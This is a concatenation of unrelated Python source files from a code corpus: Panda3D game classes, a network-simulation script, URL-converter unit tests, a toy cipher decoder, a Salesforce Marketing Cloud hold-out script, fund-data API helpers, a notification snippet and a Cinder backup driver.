        # Clamp the turn to what turnRate allows this frame, keeping sign.
        angle = math.copysign(min(abs(angle), turnRate*dt), angle)
        quat.setFromAxisAngle(angle, axis)

        newQuat = selfQuat*quat
        self.root.setQuat(Common.framework.showBase.render, newQuat)

    def getAngleWithVec(self, vec):
        """Return the signed 2D (x/y plane) angle in degrees between the
        actor's forward direction and ``vec``."""
        forward = self.actor.getQuat(Common.framework.showBase.render).getForward()
        forward2D = Vec2(forward.x, forward.y)
        vec = Vec2(vec.x, vec.y)
        vec.normalize()
        angle = forward2D.signedAngleDeg(vec)
        return angle

    def cleanup(self):
        """Detach and release all scene-graph nodes; safe to call twice."""
        if self.colliderNP is not None and not self.colliderNP.isEmpty():
            # Clear the owner tag first to break the reference cycle.
            self.colliderNP.clearPythonTag(TAG_OWNER)
            self.colliderNP.removeNode()
            self.colliderNP = None

        if self.actor is not None:
            if isinstance(self.actor, Actor):
                self.actor.cleanup()
            self.actor.removeNode()
            self.actor = None

        if self.root is not None:
            self.root.removeNode()
            self.root = None
class ArmedObject():
    """Mixin for anything that carries weapons, organised into numbered sets.

    ``weaponSets`` is a list of lists of weapon objects; ``weaponNPs`` maps
    each weapon to the scene-graph node it fires from.
    """

    def __init__(self):
        self.weaponSets = []
        self.weaponNPs = {}
        self.lockedTarget = None

    def weaponFired(self, weapon):
        """Hook called when a weapon discharges; subclasses may override."""
        pass

    def weaponReset(self, weapon):
        """Hook called when a weapon finishes resetting; override as needed."""
        pass

    def addWeapon(self, weapon, setIndex, sourceNP):
        """Register ``weapon`` in set ``setIndex``, growing the set list
        with empty sets as required, and remember its source node."""
        shortfall = setIndex + 1 - len(self.weaponSets)
        if shortfall > 0:
            self.weaponSets.extend([] for _ in range(shortfall))
        self.weaponSets[setIndex].append(weapon)
        self.weaponNPs[weapon] = sourceNP

    def startFiringSet(self, weaponSet):
        """Press the trigger of every inactive weapon in the given set."""
        if weaponSet >= len(self.weaponSets):
            return
        for heldWeapon in self.weaponSets[weaponSet]:
            if not heldWeapon.active:
                heldWeapon.triggerPressed(self)

    def ceaseFiringSet(self, weaponSet):
        """Release the trigger of every active weapon in the given set."""
        if weaponSet >= len(self.weaponSets):
            return
        for heldWeapon in self.weaponSets[weaponSet]:
            if heldWeapon.active:
                heldWeapon.triggerReleased(self)

    def update(self, dt):
        """Advance every held weapon by ``dt`` seconds."""
        for heldSet in self.weaponSets:
            for heldWeapon in heldSet:
                heldWeapon.update(dt, self)

    def attackPerformed(self, weapon):
        """Hook called when an attack lands; subclasses may override."""
        pass

    def cleanup(self):
        """Clean up every weapon and drop all references to them."""
        for heldSet in self.weaponSets:
            for heldWeapon in heldSet:
                heldWeapon.cleanup()
        self.weaponSets = []
        self.weaponNPs = {}
class Blast():
    """A short-lived, camera-facing billboard effect that grows linearly
    from ``minSize`` to ``maxSize`` over ``duration`` seconds while its
    alpha follows half a sine wave (fade in, then out)."""

    def __init__(self, model, minSize, maxSize, duration):
        self.model = model
        self.model.setTwoSided(True)
        self.model.setTransparency(True)
        # Always face the camera.
        self.model.setBillboardPointEye()

        self.minSize = minSize
        self.maxSize = maxSize
        self.sizeRange = self.maxSize - self.minSize
        self.duration = duration
        # Counts down from ``duration`` to 0 over the effect's lifetime.
        self.timer = duration

    def update(self, dt):
        """Advance the effect by ``dt`` seconds: scale up, fade on a sine arc."""
        self.timer -= dt
        if self.timer < 0:
            self.timer = 0
        perc = 1.0 - (self.timer / self.duration)
        self.model.setScale(self.minSize + self.sizeRange*perc)
        # Alpha traces half a sine wave over the lifetime (0 -> 1 -> 0).
        # Fixed: use math.pi instead of the hand-typed 3.142 approximation.
        self.model.setAlphaScale(math.sin(perc*math.pi))

    def cleanup(self):
        """Remove the billboard model from the scene graph."""
        if self.model is not None:
            self.model.removeNode()
            self.model = None
2_simulate_sdc.py | sztal/sda-model | 1 | 12797880 | """Run simulations for SDC model.
Parameters
----------
N_JOBS
Number of cores used for parallelization.
RANDOM_SEED
Seed for the random numbers generator.
SPACE
Types of social space.
Available values: 'uniform', 'lognormal', 'clusters_normal'.
N
Sizes of networks,
NDIM
Number of dimensions of simulated social spaces.
DATA_REP
Number of independent realizations of social spaces.
SDA_PARAMS
k
Expected average degree.
alpha
Homophily level.
directed
Directed/undirected networks.
p_rewire
Probability of random rewiring.
SDA_REP
Number of independent realizations of adjacency matrices.
SIM_PARAMS
degseq_type
Degree sequence type.
One of: 'poisson', 'negbinom', 'powerlaw'.
degseq_sort
Should degree sequence be sorted by expected node degrees.
"""
import os
import gc
import numpy as np
import pandas as pd
# NOTE(review): ``sklearn.externals.joblib`` was removed in scikit-learn 0.23;
# on newer environments ``Memory`` should be imported from ``joblib`` directly.
from sklearn.externals.joblib import Memory
import _

# Globals
ROOT = os.path.dirname(os.path.realpath(__file__))
HERE = ROOT
# All simulation output is written under this directory.
DATAPATH = os.path.join(HERE, 'raw-data')

# Persistence
# Disk cache so re-runs reuse previously computed simulations.
MEMORY = Memory(location='.cache', verbose=1)
N_JOBS = 4

# Data generation params
RANDOM_SEED = 101
SPACE = ('uniform', 'lognormal', 'clusters_normal')
N = (1000, 2000, 4000, 8000)
NDIM = (1, 2, 4, 8, 16)
CENTERS = (4,)
DATA_REP = 2

# SDA params
SDA_PARAMS = {
    'k': (30,),
    'alpha': (2, 4, 8, np.inf),
    'directed': (False,),
    'p_rewire': (.01,)
}
SDA_REP = 3
# NOTE(review): the module docstring documents this key as ``degseq_sort``,
# but the actual key used here is ``sort`` -- confirm which name downstream
# code expects.
SIM_PARAMS = {
    'degseq_type': ('poisson', 'negbinom', 'powerlaw'),
    'sort': (True, False)
}
# Cache results on disk; ``n_jobs`` is excluded from the cache key so the
# same cached results are reused regardless of the parallelism level.
@MEMORY.cache(ignore=['n_jobs'])
def simulate_cm(space, dparams, drep, sdaparams, sdarep, simparams, n_jobs):
    """Run the SDC variant of the SDA simulation for one social-space type.

    Thin wrapper around ``_.simulate`` with ``simfunc=_.run_sdac``.
    """
    return _.simulate(space, dparams, drep, sdaparams, sdarep,
                      simparams, n_jobs, simfunc=_.run_sdac)
# Run simulations
if RANDOM_SEED is not None:
    np.random.seed(RANDOM_SEED)

# Convenience wrapper binding all global parameters; only the space varies.
sim = lambda s: simulate_cm(
    space=s,
    dparams=(N, NDIM, CENTERS),
    drep=DATA_REP,
    sdaparams=SDA_PARAMS,
    sdarep=SDA_REP,
    simparams=SIM_PARAMS,
    n_jobs=N_JOBS
)

df = None # main data frame
gdf = None # graph data frame

# First pass: compute (and disk-cache) all simulations, freeing memory
# between spaces.
for s in SPACE:
    sim(s)
    gc.collect()

# Second pass: reload from cache and concatenate into one frame, dropping
# the heavy adjacency-matrix and label columns.
for s in SPACE:
    print(f"\rloading and processing '{s}' space' ...", end="")
    _df = sim(s)
    _df.drop(columns=['A', 'labels'], inplace=True)
    if df is None:
        df = _df
    else:
        df = pd.concat((df, _df), ignore_index=True)

# Save data -------------------------------------------------------------------
# Standard data get saved as feather file, so it can be easily
# shared with R for data analysis and visualization.
# Adjacency matrices data is saved as a separate pickle file.
# It will be used for graph visualizations.

os.makedirs(DATAPATH, exist_ok=True)

# Save main data as a feather file
df.to_feather(os.path.join(DATAPATH, 'sda-data-cm.feather'))

# Save graph data as a pickle file
# joblib.dump(gdf, os.path.join(DATAPATH, 'sda-graphs-cm.pkl'))
| 2.3125 | 2 |
tests/converter/test_url2netloc.py | Centaurioun/PyFunceble | 213 | 12797888 | """
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Tests of URL 2 Network Location converter.
Author:
<NAME>, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/special-thanks.html
Contributors:
https://pyfunceble.github.io/contributors.html
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import unittest.mock
from PyFunceble.converter.url2netloc import Url2Netloc
class TestUrl2Netloc(unittest.TestCase):
    """
    Tests our internal URL converter.
    """

    def setUp(self) -> None:
        """
        Provides a fresh converter for each test.
        """

        self.converter = Url2Netloc()

    def tearDown(self) -> None:
        """
        Destroys the converter created for the test.
        """

        del self.converter

    def _assert_netloc(self, given: str, expected: str) -> None:
        """
        Feeds :code:`given` to the converter and checks that the extracted
        network location equals :code:`expected`.
        """

        self.converter.data_to_convert = given
        actual = self.converter.get_converted()

        self.assertEqual(expected, actual)

    def test_set_data_to_convert_no_string(self) -> None:
        """
        A non-string input must be rejected with a :code:`TypeError`.
        """

        given = ["Hello", "World"]

        self.assertRaises(TypeError, lambda: self.converter.set_data_to_convert(given))

    def test_set_data_to_convert_empty_string(self) -> None:
        """
        An empty-string input must be rejected with a :code:`ValueError`.
        """

        given = ""

        self.assertRaises(ValueError, lambda: self.converter.set_data_to_convert(given))

    def test_get_converted_nothing_to_decode(self) -> None:
        """
        A bare hostname needs no conversion and is returned unchanged.
        """

        self._assert_netloc("example.org", "example.org")

    def test_get_converted_full_url(self) -> None:
        """
        The netloc is extracted from a full URL.
        """

        self._assert_netloc("https://example.org/hello/world/this/is/a/test", "example.org")

    def test_get_converted_full_url_with_port(self) -> None:
        """
        An explicit port is kept as part of the netloc.
        """

        self._assert_netloc("https://example.org:8080/hello/world/this/is/a/test", "example.org:8080")

    def test_get_converted_full_url_with_params(self) -> None:
        """
        Query parameters are stripped from a full URL.
        """

        self._assert_netloc("https://example.org/?is_admin=true", "example.org")

    def test_get_converted_url_without_scheme(self) -> None:
        """
        The netloc is extracted when no scheme is given.
        """

        self._assert_netloc("example.org/hello/world/this/is/a/test", "example.org")

    def test_get_converted_url_without_scheme_and_with_params(self) -> None:
        """
        The netloc is extracted when no scheme (but params) is given.
        """

        self._assert_netloc("example.org/?is_admin=true", "example.org")

    def test_get_converted_url_without_protocol(self) -> None:
        """
        The netloc is extracted when only :code:`://` prefixes the URL.
        """

        self._assert_netloc("://example.org/hello/world/this/is/a/test", "example.org")

    def test_get_converted_url_without_protocol_and_with_params(self) -> None:
        """
        The netloc is extracted when :code:`://` prefixes a URL with params.
        """

        self._assert_netloc("://example.org/?is_admin=true", "example.org")

    def test_get_converted_url_without_protocol_and_path(self) -> None:
        """
        The netloc is extracted when :code:`://` prefixes a bare host.
        """

        self._assert_netloc("://example.org/", "example.org")

    def test_get_converted_url_startswith_2_slashes(self) -> None:
        """
        A URL starting with two slashes still yields its netloc.
        """

        self._assert_netloc("//example.org/hello/world/this/is/a/test", "example.org")

    def test_get_converted_url_startswith_1_slash(self) -> None:
        """
        A URL starting with a single slash is all path: empty netloc.
        """

        self._assert_netloc("/example.org/hello/world/this/is/a/test", "")


if __name__ == "__main__":
    unittest.main()
| 2.125 | 2 |
# Printable-ASCII working range and message-header layout.
CEIL = 122                       # highest handled character code ('z')
END_LINE = '\n'
FLOOR = 32                       # lowest handled character code (' ')
FOG_NUM = 1                      # header index of the fog-cycle length
FOG_POS = 2                      # header index of the fog position
ROLLBACK = 90                    # wrap distance when un-shifting below FLOOR
SECURITY = 'access denied\n'
SHIFT = 0                        # header index of the Caesar shift


def verify_code(message : str) -> tuple:
    """Split an encrypted message into its three header characters and body.

    The first three characters carry the Caesar shift, the fog-cycle length
    and the fog position.  If a newline appears in the body the message is
    treated as tampered: ``code.txt`` is overwritten with ``SECURITY`` and
    parsing stops.

    Returns ``(shift, fog_num, fog_pos, code_message)``; header entries are
    ``None`` when the message is too short to contain them.
    (Fixed: the return annotation previously said ``list``.)
    """
    shift = None
    fog_num = None
    fog_pos = None
    code_message = ''
    for i, alpha in enumerate(message):
        if i == SHIFT:
            shift = alpha
        elif i == FOG_NUM:
            fog_num = alpha
        elif i == FOG_POS:
            fog_pos = alpha
        else:
            code_message += alpha
            if alpha == END_LINE:
                # Tamper response: replace the source file's content.
                with open("code.txt", "w") as file:
                    file.write(SECURITY)
                break
    return shift, fog_num, fog_pos, code_message


def clear(message : str, fog_num : int, fog_pos : int) -> str:
    """Strip fog characters, keeping only those at ``fog_pos`` in each cycle.

    A counter runs from ``FLOOR`` up to ``fog_num`` (inclusive) and wraps;
    only the characters seen while the counter equals ``fog_pos`` are real.
    """
    clear_message = ''
    i = FLOOR
    for alpha in message:
        if i > fog_num:
            i = FLOOR
        if i == fog_pos:
            clear_message += alpha
        i += 1
    return clear_message


def uncesar(message : str, shift : int) -> str:
    """Reverse the Caesar shift applied by the paired encryption device.

    Characters that would fall below the printable window wrap upward by
    ``ROLLBACK``.  NOTE(review): the FLOOR..CEIL window spans 91 codes while
    ROLLBACK is 90 -- presumably this mirrors the encrypt device exactly;
    confirm there before changing it.
    """
    uncesar_message = ''
    for alpha in message:
        ord_ascii = ord(alpha)
        if ord_ascii <= shift + FLOOR:
            uncesar_message += chr(ord_ascii+ROLLBACK-shift)
        else:
            uncesar_message += chr(ord(alpha)-shift)
    return uncesar_message
def main():
    """Read ``code.txt``, decode it and write the plaintext to ``message.txt``.

    Pipeline: ``verify_code`` (header split + tamper check) -> ``clear``
    (de-fog) -> ``uncesar`` (un-shift).  Nothing is written when the header
    is incomplete.
    """
    try:
        # open, read and verify
        encrypt_message = ''
        with open("code.txt", "r") as file:
            encrypt_message = file.read()
        shift, fog_num, fog_pos, code_message = verify_code(encrypt_message)
        if shift is not None and fog_num is not None and fog_pos is not None:
            # clear
            clear_message = clear(code_message, ord(fog_num), ord(fog_pos))

            # uncesar
            decrypt_message = uncesar(clear_message, ord(shift))

            # export
            with open('message.txt', 'w') as file:
                file.write(decrypt_message)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        print('There is a problem with: code.txt, Tip: verify the path')


if __name__ == '__main__':
    main()
public/pylib/holdoutgroup.py | shaileshakarte28/SFMC | 0 | 12797904 | <filename>public/pylib/holdoutgroup.py
import requests
import json
import xmltodict
import datetime
from math import ceil
import jxmlease
import operator
import random
from operator import itemgetter
import time
from json import loads, dumps
def auth(clientId: str,
         clientSecret: str,
         accountId: str
         ) -> dict:
    """Request an OAuth2 client-credentials token from the SFMC v2 endpoint.

    Returns the decoded JSON response, which contains ``access_token`` on
    success.  (The annotation previously claimed ``requests.Response``.)
    """
    end_point = "https://mc4pytkknrp1gsz0v23m93b3055y.auth.marketingcloudapis.com/v2/token"
    headers = {'Content-type': 'application/json;charset=UTF-8'}
    payload = {
        "grant_type":"client_credentials",
        "client_id": clientId,
        "client_secret": clientSecret,
        "account_id": accountId,
    }
    # BUG FIX: the original call passed ``{"headers": headers}`` as the third
    # positional argument of requests.post -- that slot is ``json`` and is
    # ignored when ``data`` is supplied, so the JSON Content-Type header was
    # never sent and the body went form-encoded.  The v2 token endpoint
    # expects a JSON body.
    req = requests.post(
        end_point,
        json=payload,
        headers=headers,
        # verify=False
    )
    return req.json()
# NOTE(review): credentials are hard-coded (redacted here as <KEY>) and the
# access token is printed to stdout -- move these to environment variables /
# a secrets store and drop the print before shipping.
cred = auth('<KEY>','<KEY>','6291063')
token = (cred["access_token"])
print("Access Token : ",token)
def dataextension2():
    """Mark every 10th unprocessed row of the hold-out Data Extension as
    "Hold Out", the rest as "Processed", via the SFMC SOAP API.

    Flow: retrieve rows with Status == "Unprocessed"; set aside the
    remainder modulo 10 (left "Unprocessed" for a later run); of the rest,
    every 10th record becomes the hold-out group (Flag=False, Status="Hold
    Out") and the others are flagged processed (Flag=True,
    Status="Processed").
    """
    try:
        # Credentials / target Data Extension.  ``token`` is the module-level
        # access token obtained at import time.
        accessToken = token
        account_id = "6291063"
        de_name = "Test_HoldOut_Group"
        de_external_key = "5E4FE032-6C0E-42E8-8B81-99F167D7DFC9"
    except Exception as e:
        return "There is some problem with the Credentials Provided...",e
    try:
        # SOAP Retrieve: all rows whose Status is still "Unprocessed".
        descbody =f"""
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<s:Header>
<a:Action s:mustUnderstand="1">Retrieve</a:Action>
<a:To s:mustUnderstand="1">https://webservice.s6.exacttarget.com/Service.asmx</a:To>
<fueloauth xmlns="http://exacttarget.com">{accessToken}</fueloauth>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<RetrieveRequestMsg xmlns="http://exacttarget.com/wsdl/partnerAPI">
<RetrieveRequest>
<ObjectType>DataExtensionObject[{de_name}]</ObjectType>
<Properties>NAME</Properties>
<Properties>Flag</Properties>
<Properties>Status</Properties>
<Filter xsi:type="SimpleFilterPart">
<Property>Status</Property>
<SimpleOperator>equals</SimpleOperator>
<Value>Unprocessed</Value>
</Filter>
</RetrieveRequest>
</RetrieveRequestMsg>
</s:Body>
</s:Envelope>
"""
        url = "https://webservice.s6.exacttarget.com/Service.asmx"
        headers = {'content-type': 'text/xml'}
        body = descbody
        resp = requests.post(url, data=body, headers=headers)
        response = resp.text
        # print(response)
        # XML -> dict; round-trip through JSON to get plain builtin types.
        data = jxmlease.parse(response)
        status1=data["soap:Envelope"]["soap:Body"]["RetrieveResponseMsg"]["Results"]
        status2 = loads(dumps(status1))
    except Exception as e:
        return "There are no records for holding out...",e
    else:
        # Collect the Name value (first Property) of each returned row.
        cust_list=[]
        # print(status2)
        for item in status2:
            cust_key= item["Properties"]["Property"][0]['Value']
            cust_list.append(cust_key)
        print("UnProcessed List",cust_list)
        # Remainder that doesn't fill a group of 10 is deferred (cust_1).
        n= len(cust_list)%10
        print(n)
        cust_1 = []
        for i in range(0,n):
            cust_1.append(cust_list.pop())
        print(cust_1)
        cust_2 = [ele for ele in cust_list if ele not in cust_1]
        print(cust_2)
        if len(cust_2) > 9:
            # Every 10th record of the full groups becomes the hold-out set.
            # hold_list = cust_list[::10]
            hold_list = [cust_2[x*10-1] for x in range(1,len(cust_2)) if x*10<=len(cust_2)]
            print(hold_list)
            for element in hold_list:
                # SOAP Update: mark the record as held out.
                # NOTE(review): ``xmlms`` below looks like a typo for
                # ``xmlns`` -- presumably tolerated by the endpoint; confirm
                # before "fixing" it.
                soapbody = f"""
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<s:Header>
<a:Action s:mustUnderstand="1">Update</a:Action>
<a:MessageID>urn:uuid:7e0cca04-57bd-4481-864c-6ea8039d2ea0</a:MessageID>
<a:ReplyTo>
<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:To s:mustUnderstand="1">https://webservice.s6.exacttarget.com/Service.asmx</a:To>
<fueloauth xmlms="http://exacttarget.com">{accessToken}</fueloauth>
</s:Header>
<s:Body
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<UpdateRequest
xmlns="http://exacttarget.com/wsdl/partnerAPI">
<Objects xsi:type="DataExtensionObject">
<PartnerKey xsi:nil="true"/>
<Client>
<ID>{account_id}</ID>
</Client>
<ObjectID xsi:nil="true"/>
<CustomerKey>{de_external_key}</CustomerKey>
<Properties>
<Property>
<Name>Name</Name>
<Value>{element}</Value>
</Property>
<Property>
<Name>Flag</Name>
<Value>False</Value>
</Property>
<Property>
<Name>Status</Name>
<Value>Hold Out</Value>
</Property>
</Properties>
</Objects>
</UpdateRequest>
</s:Body>
</s:Envelope>
"""
                url = "https://webservice.s6.exacttarget.com/Service.asmx"
                headers = {'content-type': 'text/xml'}
                body = soapbody
                resp = requests.post(url, data=body, headers=headers)
                print(resp.status_code)
                # print(resp.text)
            holdout_rec = hold_list
            # print("HoldOut Records: ", holdout_rec)
            # Symmetric difference = the full groups minus the hold-outs.
            # NOTE(review): going through ``set`` loses the original order.
            res_list = tuple(set(holdout_rec)^set(cust_2))
            print("Without Holdout: ", res_list)
            for element in res_list:
                # SOAP Update: mark the remaining records as processed.
                soapbody = f"""
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<s:Header>
<a:Action s:mustUnderstand="1">Update</a:Action>
<a:MessageID>urn:uuid:7e0cca04-57bd-4481-864c-6ea8039d2ea0</a:MessageID>
<a:ReplyTo>
<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:To s:mustUnderstand="1">https://webservice.s6.exacttarget.com/Service.asmx</a:To>
<fueloauth xmlms="http://exacttarget.com">{accessToken}</fueloauth>
</s:Header>
<s:Body
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<UpdateRequest
xmlns="http://exacttarget.com/wsdl/partnerAPI">
<Objects xsi:type="DataExtensionObject">
<PartnerKey xsi:nil="true"/>
<Client>
<ID>{account_id}</ID>
</Client>
<ObjectID xsi:nil="true"/>
<CustomerKey>{de_external_key}</CustomerKey>
<Properties>
<Property>
<Name>Name</Name>
<Value>{element}</Value>
</Property>
<Property>
<Name>Flag</Name>
<Value>True</Value>
</Property>
<Property>
<Name>Status</Name>
<Value>Processed</Value>
</Property>
</Properties>
</Objects>
</UpdateRequest>
</s:Body>
</s:Envelope>
"""
                url = "https://webservice.s6.exacttarget.com/Service.asmx"
                headers = {'content-type': 'text/xml'}
                body = soapbody
                resp = requests.post(url, data=body, headers=headers)
                print(resp.status_code)
                # print(resp.text)
        if len(cust_1) > 0:
            # Deferred remainder: explicitly re-write as "Unprocessed" so a
            # later run picks it up again.
            for element in cust_1:
                soapbody = f"""
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<s:Header>
<a:Action s:mustUnderstand="1">Update</a:Action>
<a:MessageID>urn:uuid:7e0cca04-57bd-4481-864c-6ea8039d2ea0</a:MessageID>
<a:ReplyTo>
<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:To s:mustUnderstand="1">https://webservice.s6.exacttarget.com/Service.asmx</a:To>
<fueloauth xmlms="http://exacttarget.com">{accessToken}</fueloauth>
</s:Header>
<s:Body
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<UpdateRequest
xmlns="http://exacttarget.com/wsdl/partnerAPI">
<Objects xsi:type="DataExtensionObject">
<PartnerKey xsi:nil="true"/>
<Client>
<ID>{account_id}</ID>
</Client>
<ObjectID xsi:nil="true"/>
<CustomerKey>{de_external_key}</CustomerKey>
<Properties>
<Property>
<Name>Name</Name>
<Value>{element}</Value>
</Property>
<Property>
<Name>Flag</Name>
<Value>True</Value>
</Property>
<Property>
<Name>Status</Name>
<Value>Unprocessed</Value>
</Property>
</Properties>
</Objects>
</UpdateRequest>
</s:Body>
</s:Envelope>
"""
                url = "https://webservice.s6.exacttarget.com/Service.asmx"
                headers = {'content-type': 'text/xml'}
                body = soapbody
                resp = requests.post(url, data=body, headers=headers)
                print(resp.status_code)
                # print(resp.text)
        return "All Records Processed Sucessfully..."
dataextension2() | 1.523438 | 2 |
function/python/brightics/function/textanalytics/__init__.py | GSByeon/studio | 0 | 12797912 | <gh_stars>0
from .ngram import ngram
from .lda import lda
from .tfidf import tfidf
| 0.539063 | 1 |
utils.py | quanhua92/vietnam_investment_fund | 0 | 12797920 | <gh_stars>0
import requests
import json
from datetime import datetime
def get_all_products():
    """Fetch every fund listed on fmarket (new and currently-trading funds).

    Returns the decoded JSON payload of the product-filter endpoint.
    """
    endpoint = "https://api.fmarket.vn/res/products/filter"
    payload = {
        "types": ["NEW_FUND", "TRADING_FUND"],
        "issuerIds": [],
        "page": 1,
        "pageSize": 1000,
        "fundAssetTypes": [],
        "bondRemainPeriods": [],
        "searchField": "",
    }
    response = requests.post(
        endpoint,
        json=payload,
        headers={"Content-Type": "application/json; charset=utf-8"},
    )
    return json.loads(response.text)
def get_history(product_id):
    """Fetch the complete NAV history of one fund, up to today.

    Parameters
    ----------
    product_id:
        fmarket product identifier as used by the NAV-history endpoint.
    """
    endpoint = "https://api.fmarket.vn/res/product/get-nav-history"
    today = datetime.now().strftime("%Y%m%d")
    payload = {
        "isAllData": 1,
        "productId": product_id,
        "fromDate": None,
        "toDate": today,
    }
    response = requests.post(
        endpoint,
        json=payload,
        headers={"Content-Type": "application/json; charset=utf-8"},
    )
    return json.loads(response.text)
Project 8/DeskNotification.py | ingwant/Python-Programs | 0 | 12797928 | <filename>Project 8/DeskNotification.py
# pip install plyer
from plyer import notification
def send_desk_message(title, message):
    """Show a desktop toast notification via plyer.

    The icon file is expected to sit next to this script; the toast stays
    visible for five seconds.
    """
    options = {
        "title": title,
        "message": message,
        "app_icon": "circle-48.ico",
        "timeout": 5,
    }
    notification.notify(**options)
send_desk_message("TITLE", "This is a message....")
| 1.109375 | 1 |
cinder/backup/drivers/sheepdog.py | AO-AO/cmss-cinder | 0 | 12797936 | <gh_stars>0
#coding:utf-8
import time
import json
import urllib2
from oslo.config import cfg
from cinder import exception
from oslo_log import log as logging
from cinder.backup.driver import BackupDriver
LOG = logging.getLogger(__name__)
service_opts = [
cfg.StrOpt('cinder_ip',
default='172.16.172.250:8776',
help='ebs management node ip.'),
]
CONF = cfg.CONF
CONF.register_opts(service_opts)
class SheepdogBackupDriver(BackupDriver):
    """Backup driver that proxies backup/restore/delete operations to an
    EBS management node over its REST admin API and polls until the
    operation completes.

    Fix: ``except urllib2.HTTPError, e:`` is Python-2-only syntax (removed
    in Python 3, deprecated since 2.6); replaced with ``except ... as e:``,
    which behaves identically on Python 2.6+.
    """

    def __init__(self, context, db_driver=None):
        super(SheepdogBackupDriver, self).__init__(db_driver)
        self.context = context
        # Management node address, e.g. "172.16.172.250:8776".
        self._server_ip = self._utf8(CONF.cinder_ip)

    @staticmethod
    def _utf8(s):
        """Ensure string s is utf8 (i.e. not unicode)."""
        if isinstance(s, str):
            return s
        return s.encode('utf8')

    def backup(self, backup, volume_file):
        """Create a backup on the management node and poll until done.

        Returns the backup size in MB as reported by the node
        (``object_count`` field).
        """
        LOG.info('Starting backup...... Creating a new backup for volume:%s.' % backup['volume_id'])
        backup_id = backup['id']
        url = 'http://' + self._server_ip + '/v2/admin/backups'
        data = {
            "backup": {
                "container": backup['container'],
                "description": backup['display_description'],
                "name": backup['display_name'],
                "volume_id": backup['volume_id'],
                "backupid": backup_id
            }
        }
        jdata = json.dumps(data)
        req = urllib2.Request(url, jdata)
        req.add_header('Content-type', 'application/json')
        try:
            response = urllib2.urlopen(req)
            LOG.debug(response.read())
        except urllib2.HTTPError as e:
            LOG.debug(e.code)
            msg = "redirect backup cmd failed!"
            raise exception.BackupOperationError(msg)
        # Poll the node until the backup reaches 'available'.
        while True:
            url = 'http://' + self._server_ip + '/v2/admin/backups/' + backup_id
            try:
                response = urllib2.urlopen(url)
                ret = response.read()
                LOG.debug("RET: %r" % ret)
                data = json.loads(ret)
            except urllib2.HTTPError as e:
                LOG.debug(e.code)
                msg = "confirm backup cmd failed!"
                raise exception.BackupOperationError(msg)
            if data['backup']['status'] == 'available':
                # NOTE(review): the node reports the size via object_count,
                # interpreted here as MB.
                size = data['backup']['object_count']
                LOG.debug("size %s MB." % size)
                LOG.info('backup finished.')
                break
            time.sleep(3)
        return size

    def restore(self, backup, target_volume_id, volume_file):
        """Restore *backup* into *target_volume_id* and poll until done."""
        LOG.info('Starting restore...... restore from src_volume:%(src)s to dst_volume:%(dst)s' %
                 {'src': backup['volume_id'], 'dst': str("volume-" + target_volume_id)})
        backup_id = backup['id']
        url = 'http://' + self._server_ip + '/v2/admin/backups/' + backup_id + '/restore'
        data = {
            "restore": {
                "volume_id": target_volume_id
            }
        }
        jdata = json.dumps(data)
        req = urllib2.Request(url, jdata)
        req.add_header('Content-type', 'application/json')
        try:
            response = urllib2.urlopen(req)
            LOG.debug(response.read())
        except urllib2.HTTPError as e:
            LOG.debug(e.code)
            msg = "redirect restore cmd failed!"
            raise exception.BackupOperationError(msg)
